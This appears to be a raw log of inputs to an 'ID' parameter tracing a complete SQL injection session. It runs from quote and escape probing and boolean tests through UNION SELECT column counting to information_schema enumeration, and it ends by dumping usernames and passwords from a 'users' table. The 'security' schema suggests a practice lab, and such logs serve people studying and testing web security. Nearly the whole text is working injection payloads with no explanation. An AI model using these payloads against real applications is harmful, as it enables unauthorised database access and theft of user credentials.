ID:1
ID:1\'
ID:1
ID:1 and 1=2
ID:1\' and \'1\'=\'2
ID:1\' and \'1\'=\'2
ID:1\'\'\'\'\'\'
ID:1xssa
ID:1
ID:1
ID:1
ID:1
ID:1\'
ID:1\'
ID:1\\\'
ID:1\\\\\'
ID:1`
ID:1`
ID:1`
ID:1'
ID:1‘
ID:1'
ID:1' and 1=2
ID:1' and '1'=2'
ID:1' and '1'='2
ID:1' and '1'='2
ID:1
ID:1' union select 1,2,3 #
ID:1' union select 1,2,3 #
ID:1' union select 1
ID:1' union select 1,2,3
ID:1 union select 1,2,3 
ID:1 union select 1,2,3 #
ID:1' union select 1,2,3 #
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 #
ID:1' order by 1
ID:1' order by 1#
ID:1' order by 4#
ID:1' union select 1,2,3 #
ID:19491' union select 1,2,3 #
ID:19491' union (select group_concat(schema_name) from information_schema.schemata),3#
ID:19491' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 #
ID:19491' union select 1,(select database()),3 #
ID:19491' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 #
ID:19491' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security') #
ID:19491' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),(select group_concat(table_name) from information_schema.tables where table_schema='security') #
ID:19491' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),(select group_concat(passward) from users) #
ID:19491' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),(select group_concat(password) from users) #
ID:19491' union select 1,(select group_concat(username) from users),(select group_concat(password) from users) #
